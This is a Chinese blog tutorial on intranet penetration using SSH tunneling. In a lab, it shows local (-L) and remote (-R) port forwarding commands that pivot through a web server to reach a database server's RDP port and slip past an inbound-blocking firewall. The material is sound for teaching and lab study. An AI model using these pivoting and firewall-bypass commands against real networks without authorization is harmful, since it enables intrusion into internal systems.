内网渗透之应用层隧道技术

​ 应用层中的隧道技术主要应用软件提供的端口来发送数据。常用的隧道技术协议有SSH,HTTP/HTTPS以及DNS

​ 一个普通的SSH命令如下:

ssh root@192.168.1.1

常见命令如下:
-C:压缩传输,提高传输速度
-f:将SSH传输转入后台执行,不占用当前的Shell
-N:建立静默连接(建立了连接,但是看不到具体会话)
-g:允许远程主机连接本地用于转发的端口
-L:本地端口转发
-R:远程端口转发

SSH协议本地转发

​ 实验环境

攻击者VPS(192.168.1.76)
内网中有:
web服务器(外网IP:192.168.1.26 内网IP:172.168.1.16)
数据库服务器(IP:172.168.1.18)
外部VPS能访问web服务器,但是无法访问数据库服务器,数据库服务器和web服务器能够互相访问。

目标:以web服务器为跳板,访问数据库服务器的3389端口

​ 以web服务器为跳板,将数据库服务器的3389端口,映射到VPS的1153端口,然后访问VPS的1153端口。

​ 在VPS中执行如下命令

ssh -CfNg -L 1153(VPS端口):172.168.1.18(目标主机):3389(目标端口) root@192.168.1.26(跳板机)

​ 执行以下命令查看本地1153端口是否连接

netstat -tulnp | grep "1153"

​ 可以看到,在进行本地映射时,本地SSH进程会监听1153端口

​ 执行如下命令,在本地系统中访问VPS的1153端口,可以看到本地的1153端口已与数据库服务器的3389端口建立联系了。

rdesktop 127.0.0.1:1153

SSH进程的本地端口映射可以将本地的某个端口转发到远端指定机器的指定端口;

本地端口转发则是在本地监听一个端口,所有访问这个端口的数据都会通过SSH隧道传输到远端的对应端口

​ 换言之:当本机(192.168.1.76)打算连接本机的1153端口时(rdesktop 127.0.0.1:1153),这时候请求会通过ssh协议发送至web服务器(192.168.1.26),然后在web服务器(172.168.1.16)这台机子上解封装,形成远程桌面连接的流量,发送至数据库服务器(172.168.1.18)。

​ 可以看一下各机器的端口使用情况

​ VPS:

内网渗透之应用层隧道技术

​ VPS上的随机端口与Web服务器的22号端口连接

​ Web服务器:

​ 可以看到这里的web服务器的内网也是开了一个随机端口与数据库服务器的3389端口相连接

​ 数据库服务器:

数据库服务器的3389端口是和web服务器的随机端口连接的

本地端口转发中将VPS作为客户机,跳板机(web服务器)作为服务器。

故而本地转发是将本地机(客户机)的某个端口转发到远端指定机器的指定端口,也就是将VPS中执行的rdesktop 127.0.0.1:1153转发到目标主机的3389端口。

远程转发

​ 因为在实际企业环境中,一般防火墙都是只允许出,不允许进的状态。

攻击者VPS(192.168.1.76)
内网中有:
web服务器(内网IP:172.168.1.16)
数据库服务器(内网IP:172.168.1.18)
外部VPS不能访问内网中的任何机器。web服务器能够访问外部vps。数据库服务器无法访问外部VPS

目标:通过外部VPS访问数据库服务器的3389端口

以web服务器为跳板,将VPS(192.168.1.76)的3307端口的流量转发到数据库服务器(172.168.1.18)的3389端口,然后访问VPS的3307端口,就可以访问数据库服务器的3389端口

​ 在Web服务器上执行如下命令:

ssh -CfNg -R 3307(VPS端口):172.168.1.18(目标主机):3389(目标端口) root@192.168.1.76

​ 然后在VPS上执行如下命令:

rdesktop 127.0.0.1:3307

​ 可以看一下各机器的端口使用情况

​ VPS此时是作为SSH服务中的服务端,VPS中开启22号端口,由内网出来的流量将会通过防火墙的随机端口,发送至VPS的22号端口。向本地的3307端口发出远程桌面连接的流量将会通过22号端口以应答的形式发送给web服务器。

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/c62b5d0921c3622e97dd427ed9d27cd0.html